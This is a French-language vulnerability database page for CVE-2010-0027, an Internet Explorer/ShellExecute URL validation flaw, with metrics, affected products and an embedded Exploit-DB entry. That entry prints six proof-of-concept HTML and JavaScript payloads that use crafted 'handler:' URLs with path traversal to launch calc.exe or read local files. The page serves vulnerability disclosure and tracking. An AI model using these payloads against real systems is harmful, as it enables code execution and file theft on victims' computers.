CVE-2010-0027 : Détail

CVE-2010-0027

Code Injection
A03-Injection
76.87%V3
Network
2010-01-22
20h20 +00:00
2018-10-12
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The URL validation functionality in Microsoft Internet Explorer 5.01, 6, 6 SP1, 7 and 8, and the ShellExecute API function in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, does not properly process input parameters, which allows remote attackers to execute arbitrary local programs via a crafted URL, aka "URL Validation Vulnerability."

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 33552

Date de publication : 2010-01-20 23h00 +00:00
Auteur : Lostmon Lords
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/37884/info Microsoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer. NOTE: Reports indicate that the issue can also be exploited via other applications that use the 'ShellExecute()' API. ############# PoC one ################# <html> <iframe id="myIframe" src="handler:handler#:../../../../C:\windows/calc.exe"> </html> ############## PoC Two ############# <html> <iframe id="myIframe" src="handler:handler#:../../../../C:\our_txtfile.txt"> </html> ############# PoC Three ############### <html> <iframe id="myIframe" src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"> </iframe> </html> ############# PoC four ############## <html> <head> </head> <body> <script type="text/javascript"> function getContentFromIframe(iFrameName) { var myIFrame = document.getElementById(iFrameName); var content = myIFrame.contentWindow.document.body.innerHTML; alert('content: ' + content); content = 'change iframe content'; myIFrame.contentWindow.document.body.innerHTML = content; } </script> <iframe id="myIframe" src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe> <a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a> </body> </html> ########### PoC Five ###################### var contents; var req; req = new XMLHttpRequest(); req.onreadystatechange = processReqChange; req.open(’GET’, ‘handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms’, true); req.send(”); ############### PoC six ############# <html><body><div> <script> function getHTTPObject() { if (typeof XMLHttpRequest != 'undefined') { return new XMLHttpRequest(); } try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } return false; } x = getHTTPObject(); x.open("GET","shit:shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",false); x.send(null); alert(x.responseText); </script> </div></body></html>

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 8

Microsoft>>Internet_explorer >> Version 8.0.6001

Microsoft>>Windows_7 >> Version -

Microsoft>>Windows_server_2003 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version -

Configuraton 0

Microsoft>>Internet_explorer >> Version 7

Microsoft>>Internet_explorer >> Version 7.0

Microsoft>>Internet_explorer >> Version 7.0.5730

Microsoft>>Internet_explorer >> Version 7.0.5730.11

Microsoft>>Internet_explorer >> Version 7.00.5730.1100

Microsoft>>Internet_explorer >> Version 7.00.6000.16386

Microsoft>>Internet_explorer >> Version 7.00.6000.16441

Microsoft>>Windows_server_2003 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version -

Configuraton 0

Microsoft>>Internet_explorer >> Version 5.01

Microsoft>>Internet_explorer >> Version 6

Microsoft>>Internet_explorer >> Version 6

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_server_2003 >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version -

Références

http://www.us-cert.gov/cas/techalerts/TA10-040A.html
Tags : third-party-advisory, x_refsource_CERT